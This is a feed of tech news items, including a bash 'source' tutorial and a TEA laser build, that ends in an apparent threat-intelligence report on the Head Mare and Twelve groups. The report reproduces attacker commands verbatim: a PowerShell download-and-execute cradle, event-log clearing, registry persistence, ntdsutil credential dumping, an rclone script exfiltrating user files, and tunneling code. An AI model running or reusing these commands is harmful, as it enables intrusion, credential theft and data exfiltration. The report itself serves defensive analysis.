Implemented as a simple, 14 kB JavaScript script to be included in an HTML page, it allows one to write CSS files using proper spelling, such as background-colour and centre. Meanwhile harsh language such as !important is replaced with the more pleasant !if-you-would-be-so-kind. It is expected that although for now this script has to be included on each page to use BritCSS, native support will soon be implemented in every browser, superseding the US dialect version. [Declan] has also been recommended to be awarded the Order of the British Empire for his outstanding services.


hackaday.com/2025/03/13/britcs…


Have Li-ion Batteries Gone Too Far?


The proliferation of affordable lithium batteries has made modern life convenient in a way we could only imagine in the 80s when everything was powered by squadrons of AAs, or has it? [Ian Bogost] ponders whether sticking a lithium in every new device is really the best idea.

There’s no doubt, that for some applications, lithium-based chemistries are a critically-enabling technology. NiMH-based EVs of the 1990s suffered short range and slow recharge times which made them only useful as commuter cars, but is a flashlight really better with lithium than with a replaceable cell? When household electronics are treated as disposable, and Right to Repair is only a glimmer in the eye of some legislators, a worn-out cell in a rarely-used device might destine it to the trash bin, especially for the less technically inclined.

[Bogost] decries “the misconception that rechargeables are always better,” although we wonder why his article completely fails to mention the existence of rechargeable NiMH AAs and AAAs which are loads better than their forebears in the 90s. Perhaps even more relevantly, standardized pouch and cylindrical lithium cells are available like the venerable 18650 which we know many makers prefer due to their easy-to-obtain nature. Regardless, we can certainly agree with the author that easy to source and replace batteries are few and far between in many consumer electronics these days. Perhaps new EU regulations will help?

Once you’ve selected a battery for your project, don’t forget to manage it if it’s a Li-ion cell. With great power density, comes great responsibility.


hackaday.com/2025/03/13/have-l…


Got Junk? Then Build This Scrappy TEA Laser


A piece of glass, some bits of tinfoil, a sheet of plastic, a couple of razor blades, and a few assorted bits and bobs are all it takes to build this TEA nitrogen laser. Oh, and a 5,000-volt flyback supply with enough amperage to stop your heart. You’ll need that too.

Seriously, if you choose to follow [MultiverseCurator] ‘s example and build this laser, you’ll want to take the proper precautions. A transversely excited atmospheric laser is simple in concept, but there are plenty of ways for them to go wrong. Unlike the gas lasers used in laser cutters, there’s no enclosed resonator cavity or mirrors. Rather, the excitation takes place across a narrow gap between two electrodes, using atmospheric nitrogen as the lasing medium. This results in hard UV emissions, which means you can’t see them with the naked eye. Add to that the spark gap creating extremely loud discharges as the laser operates, and hazards abound. Proceed with caution.

Construction starts with a flat glass plate and a pair of large capacitors made from aluminum foil plates separated by a plastic dielectric. The razor blades are connected across the capacitors, separated by a narrow gap, with an inductor made from magnet wire in parallel. A spark gap made from nuts and bolts goes in series, and the whole assembly gets connected to a high-voltage power supply — [Multiverse] used a ZVS driver and a CRT flyback transformer with an eight-megohm resistor in series. The video below has all the build details.

It’ll take a little fiddling to get it lasing, and you’ll need something phosphorescent to see the UV light — a scrap of copy paper should do. But the results are pretty amazing for something made from scrap. If you want to take the design to the next level, you’ll want to check out [Les Wright]’s TEA laser build.

youtube.com/embed/uLyVpYIYT1E?…


hackaday.com/2025/03/13/got-ju…


Linux Fu: Use the Source (Command), Luke


You can argue if bash is a good programming language or not, but you can’t argue that it is a programming language. However, there are a few oddities about it that make it different from most other languages you probably know. For one thing, variables are dynamically scoped. Second, you can easily change variables in an upper scope. This leads to a problem when you want to do something like reset your path:
#!/bin/bash
#: This does NOT work
PATH=/usr/bin:/bin

Well, actually, it does work; it just doesn’t work the way you imagine it might. The key is to realize that when you execute our script (say, resetpath), a new copy of bash runs. It inherits all the variables from your shell. Now the script sets PATH for the new copy of bash. Anything else you run in that script will see your change. But when the script exits, the new copy of bash is gone and the old copy sees the same old PATH it always did.

Sometimes, this is a benefit, similar to “call by value” in other languages. However, what if you want to influence things? What’s more is that the situation is just the opposite within bash functions. For example:
#!/bin/bash

b() {
echo B: $x
x=200
}

a() {
x=100
b
echo A: $x
}

a
#: output
#: B: 100
#: A: 200

Function b has no difficulty reading and even setting variable x.

The Answer, Of Source Course


The answer to the first problem is to use the source command (which can be either the word source or a single period). This tells bash to avoid running a new interpreter and just pretend you’d entered all the lines in a file from the console.

This is great sometimes. Our resetpath script will actually work just fine with either of these commands:
source resetpath
. resetpath

You don’t even need the #! line, although it doesn’t hurt. However, there are a few problems.

The Catches


First, if you exit, then you exit the entire shell, not something you probably meant to do. Second, you wind up polluting the variable space of the parent. For example, if your script creates a function X, with a regular shell script, that function goes away as soon as your script stops. With a source script, function X now will live forever unless you do something about it.

Neither of these problems are insurmountable, of course, and you’ll see a few ways to address it in the example code in this post.

A Simple Example


If you spend a lot of time on the command line, you might want to have shortcut names for directories. What’s more, you might want to execute a little script when you go to particular directories or even when you leave them.

My plan is to keep a simple file in ~/.proj_dirs. To keep things simple, I’m assuming you can figure out the bash format:
PROJ_DIRS["docs"]="~/library/documents"
PROJ_DIRS["video"]="~/library/videos"
PROJ_DIRS["arduino"]="/home/alw/projects/embedded/Arduino"
. . .
The eventual goal is to replace the cd command (or, at least, allow for that). However, it would be a pain to have to write something like “source pcd arduino” every time.

The Alias Solution


The answer is pretty simple. You can create a script that can install itself as an alias. Here’s the basic flow:
#!/bin/bash
#: This is not a bash shell script
#: But needs to be sourced. However...
#: Try:
#: eval $(__project_dir.sh --__install project_dir)
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd"
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
#: Your source script goes here
...

The idea is that if you run as a regular script with –__install, it returns the alias command. You can then eval that in, for example, a startup script (like .bashrc or .profile), and then you’ll have the alias you want. By default, the code uses pcd, although you can set up any name you like on the command line. You could even create an alias for cd if you wanted to do that.

Why Not Automatic?


You could, of course, detect if you were running normally or as a source automatically. Turns out this is somewhat finicky across shells, although if you are sure you are always using real bash, it is feasible. For example:
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
echo I am not sourced!
fi

Variables


Once you have the basic framework, it is easy to write the scripts to read the “database” (also using source) and do the actual work. However, there is a slight problem. Once you produce all the variables you need to do the work, it leaves all that pollution in your shell’s namespace.

Of course, you could write a function to clean up everything you use, but that’s a pain and error prone, too. A better idea is to write your code in a bash function. Then you can use local variables that will go away when the function returns. That leaves you with just your function to clear up with unset.

That leads to this simple framework:
#!/bin/bash
if [[ "${BASH_SOURCE[0]}" == "$0" ]]
then
if [ "$1" == "--__install" ] # this should only be called from "real" script
then
aname="$2"
if [ "$aname" == "" ]
then
aname="pcd" # default alias name
fi
echo -n "alias '$aname'='source "
aname=$(realpath -s "$0")
echo "$aname'"
exit 0
fi
echo "You must source this script"
exit 1
fi

#: Ok your script goes here

main() {
. . .

}

#: Be sure to have this at the end
#: Actually named with underscores in the real code
#: But that upsets the rendering in browser
#: Actual code at gist.github.com/wd5gnr/c5681f2…
go() {
local tmprv
main "$@"
tmprv=$?
unset main, go
return $tmprv
}

go "$@"
return $?
The very bottom calls the go function, which calls your main function. Then the go function destroys your main function and itself. If you create new functions that you don’t want to keep around, you’ll need to destroy them yourself. Besides, you might be creating functions you want to keep, so the framework can’t decide.

The Whole Thing


You can find the entire example on GitHub. Outside of the management of the alias and the variable scope, the script is unremarkable. Note the optional scripts in the directories (.dir_enter and .dir_exit) are sourced also, so they only need to be readable (-r) not executable (-x).

The only other nuance is that if you enter anything as a directory that the program doesn’t recognize, it assumes it is an actual directory, so you can use this to replace the cd command entirely if you want.

Since the script can tell if it is sourced or not, it is possible to start in the source mode and then call yourself as a normal script to do work where that makes more sense. As usual with bash, there are lots of possibilities.

We talk about bash programming a lot around here. Debugging can be helpful, although they haven’t packaged the debugger for newer versions of bash lately.


hackaday.com/2025/03/13/linux-…


Hacking a Rotary Phone


[Yaymukund] made an interesting observation. Old-style rotary phones were made to last and made for service. Why? Because you didn’t own them, the phone company did. There was no advantage for them for you to need a service call or a new phone. Of course, many of these old phones are still hanging around like the GPO 746 that appears in the post.

What do you do with an old rotary phone? In this case, you make it play a random tune whenever someone picks up the handset. As you might expect, you don’t need much of the original phone to do this. In particular, you need the handset receiver and the switch hook. We’d have liked to read the dial to select a tune, but perhaps that could be in version two.

All the components wire back to a D92732 circuit board. Finding the right wires was a bit finicky, but eventually, a Teensy, a battery pack, and an audio breakout board were in place. The rest is mostly trivial.

[Yaymukund] spent about £300, but over half of that was on tools most Hackaday readers will already have. The phone itself was £65. You can use these phones as a basis for many projects. Even if you want to go mobile.


hackaday.com/2025/03/13/hackin…


Hackaday Europe 2025: Speaker Schedule and Official Event Page


Hackaday Europe 2025 is just days away, and we’ve got the finalized speaker schedule hot off the digital press. We’re also pleased to announce that the event page is now officially live, where you can find all the vital information about the weekend’s festivities in one place.

Whether you’ll be joining the fun in Berlin, or watching the live stream from home, we’ve got a fantastic lineup of speakers this year who are eager to tell us all about the projects that have been keeping them up at night recently:

Saturday Schedule


Registration and Breakfast
9:00 – 10:00
Opening Remarks
10:00 – 10:20
What if the Future [of Electronics] was Compostable?
10:30 – 11:20 (Keynote)
David Cuartielles
Manufacturing the Hackaday Supercon Badge
11:30 – 11:50
Giovanni Salinas
Seeing Through Silicon with IRIS (InfraRed, in-situ) Imaging
12:00 – 12:20
Bunnie Huang
Lunch
12:30 – 13:30
Developing a NFC Based Decentralized Payment System
13:30 – 13:50
Daniel Büchele & Andre Zibell
Hacking a Pinball Machine
14:00 – 14:40
Daniel Dakhno
Hardware Startup / Product Pitfalls
14:50 – 15:30
Sera Evcimen
Creating Light Sculptures for Fun and…Mostly for Fun
15:40 – 16:00
Erik Bosman
The Core64 – NeonPixels – 65uino Collaboration
16:10 – 16:50
Geppert, Freyermuth, & Nielsen
Make PCBs Bend Over Backwards for You: How to Design Flexible PCBs
17:00 – 17:20
Rehana Al-Soltane
More Than Motors: Decoding the Software Behind Pen Plotters and CNC Devices
17:30 – 18:10
Francis Stokes
Half-size Hacking – 0.05in Matrix Boards Under the Microscope
18:20 – 18:40
Alun Morris
Dinner
18:40 – 20:00
HEU1993 to WHY2025: Dutch Hacker Camps from the Past and the Future
20:00 – 20:40
Christel Sanders
Vectors, Pixels, Plotters and Public Participation
20:50 – 21:30
Niklas Roy
Live Performance
21:30 – 22:00
Rich Hogben & Aleksandar Bradic
Badge Hacking Ceremony
22:00 – 24:00

Time Has Run Out!


Tickets sold out a few days ago, so if you’ve got one we’ll see you soon, and if not, we will be streaming all of the Saturday talks live, so hit up Hackaday on the weekend and you can play along, at least virtually. And for back-channel chat, join us on the Hackaday Discord #europe-2025 channel.


hackaday.com/2025/03/13/hackad…


100 giorni con un Cuore Meccanico! il futuro dei trapianti è già qui?


L’azienda australiana BiVACOR ha raggiunto un traguardo importante nei suoi sviluppi: un paziente ha vissuto per più di 100 giorni con il cuore meccanico da loro creato, dopodiché è stato sottoposto con successo a un trapianto di organi da donatore. Il nome dell’uomo, che necessitava di un trapianto a causa di una grave malattia, non è stato reso noto.

Il sistema sviluppato, denominato Total Artificial Heart (TAH), è un meccanismo innovativo di circolazione sanguigna. Il progetto si basa su una pompa elettromeccanica con una sola parte mobile, un rotore, che viene mantenuto nella posizione desiderata mediante levitazione magnetica. Il vantaggio principale del dispositivo è la sua capacità di dirigere simultaneamente il flusso sanguigno sia al corpo sia ai polmoni.

Gli ingegneri hanno cambiato radicalmente l’approccio tradizionale alla risoluzione del problema. I modelli precedenti contenevano molte parti mobili che si usuravano gradualmente entrando in contatto tra loro. Nel nuovo modello, il rotore, che ricorda nella sua forma una speciale girante, letteralmente si libra nell’aria senza toccare altre parti.

L’azienda ha addirittura presentato un modello animato in 3D del meccanismo, dimostrando chiaramente il principio del suo funzionamento. Puoi guardarlo Qui .

Il funzionamento dell’impianto è garantito da un sistema di alimentazione esterno. Il controller e le batterie sono collegati al dispositivo tramite un cavo transcutaneo, uno speciale filo che passa attraverso una piccola incisione nel corpo del paziente.

L’anno scorso, BiVACOR ha condotto il suo primo studio negli Stati Uniti, su cinque pazienti sottoposti a TAH come misura temporanea in attesa di un donatore di cuore. Tutti i partecipanti all’esperimento sono stati sottoposti con successo all’intervento chirurgico e sono stati dimessi dall’ospedale dopo qualche tempo. Di due di loro si conosce il destino: uno ha ricevuto il cuore di un donatore 27 giorni dopo l’installazione del TAH, l’altro otto giorni dopo.

L’operazione sul paziente australiano è durata sei ore. Dopo la guarigione, i medici hanno permesso all’uomo di lasciare la clinica. Per più di tre mesi ha condotto una vita normale con l’impianto, finché non si è presentata l’opportunità di sottoporsi a un trapianto.

Il problema delle malattie cardiache resta estremamente acuto e il numero di organi donati disponibili per il trapianto è catastroficamente esiguo. Gli specialisti del BiVACOR intendono potenziare la loro invenzione in modo che possa funzionare fino a dieci anni, più o meno lo stesso periodo di un vero cuore trapiantato.

Tuttavia, i medici avvertono che, nonostante i risultati incoraggianti, lo sviluppo è ancora nella fase di sperimentazione clinica. Negli Stati Uniti sono state approvate solo altre 15 procedure TAH. Ci vorranno anni di ricerca prima che la tecnologia venga approvata per un uso diffuso, sia come supporto temporaneo per i pazienti in lista d’attesa, sia come misura permanente.

L'articolo 100 giorni con un Cuore Meccanico! il futuro dei trapianti è già qui? proviene da il blog della sicurezza informatica.


High-Speed Reservoir Computing With Integrated Laser Graded Artificial Neurons


So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
General reservoir computing with laser graded neuron. (Credit: Yikun Nie et al., 2024, Optica)
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.

The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.

Multiple of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). By having the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.


hackaday.com/2025/03/13/high-s…


Head Mare and Twelve join forces to attack Russian entities



Introduction


In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.

The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.

This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.

Technical details

Head Mare’s toolkit


The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.

  • mimikatz;
  • ADRecon;
  • secretsdump;
  • ProcDump;
  • Localtonet;
  • revsocks;
  • ngrok;
  • cloudflared;
  • Gost;
  • fscan;
  • SoftPerfect Network Scanner;
  • mRemoteNG;
  • PSExec;
  • smbexec;
  • wmiexec;
  • LockBit 3.0;
  • Babuk.

Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.

Notable new tools


Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.

In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.

Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.

Initial Access


While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).

The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.

The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.

Persistence


The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.

They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.

Anti-detection techniques


Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:

SoftwarePath in the system
Cloud storages sync tool rcloneC:\ProgramData\wusa.exe
PhantomJitterC:\Windows\System32\inetsrv\calc.exe
cloudflaredC:\Windows\System32\winuac.exe
GostC:\Windows\System32\winsw.exe

In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.

Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.

Command and Control


After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.

In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.

Pivoting


The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.

Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.

Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.

The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token

Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "

Port number updated to $port in $winswxmlPath"

# Service install
Write-Host "

Installing gost as service"
Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the Gost executable file as a service and passes necessary settings to it.

If -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {

# Service install
Write-Host "

Installing cloudflared as service"
Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
}
In this code snippet, the script installs the cloudflared service and passes settings to it by means of the command line.

In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "

Uninstalling gost"
Start-Process sc.exe -ArgumentList "stop winsw" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $winswPath -ArgumentList "uninstall" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

Write-Host "

Uninstalling cloudflared"
Start-Process sc.exe -ArgumentList "stop winuac" -RedirectStandardOutput $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output
Start-Process $cloudflaredPath -ArgumentList "service uninstall" -RedirectStandardError $tempFile -NoNewWindow -Wait
$output = Get-Content $tempFile
Write-Output $output

$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "

Deleted: $filePath"
} else {
Write-Output " File not found: $filePath"
}
}
}
After deleting the services, the script deletes executables, configuration files, and logs of the tools.

In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.

Reconnaissance


The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.

The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>

Privilege Escalation


The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.

Command Execution


The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t
REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.

A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex
([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com
Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com

Credential Access


The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip

Lateral Movement


The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.

Data Collection and Exfiltration


Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.

Final goal: file encryption


As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:

  • C:\Users\{username}\Desktop\locker.exe;
  • С:\Windows\SYSVOL\Intel\locker.exe.

Below is a sample ransom note, with the cybercriminals’ contacts redacted:

Contents of a LockBit ransom note
Contents of a LockBit ransom note

Connection between Head Mare and Twelve


In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:

  1. A previously seen IP address:
    • 45.156.21[.]148


  2. Malware:
    • PhantomJitter


Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.

However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.

Analysis of the Head Mare techniques and tools
Analysis of the Head Mare techniques and tools

In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.

Analysis of the Twelve techniques and tools
Analysis of the Twelve techniques and tools

Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.

  • 360nvidia[.]com;
  • 45.156.27[.]115

In addition, we have identified other similarities in the arsenal of the two groups:

  1. File names:
    • proxy.ps1
    • ad_without_dc.ps1


  2. Paths:
    • C:\Windows\System32\winsw.exe
    • C:\Windows\System32\winsws.exe
    • C:\Windows\System32\winuac.exe


  3. Service names:
    • winsw (Microsoft Windows Update)
    • winuac (Microsoft UAC Service Wrapper)


  4. Victims:
    • Manufacture, government, energy


The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.

Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve
Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve

Conclusion


Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.

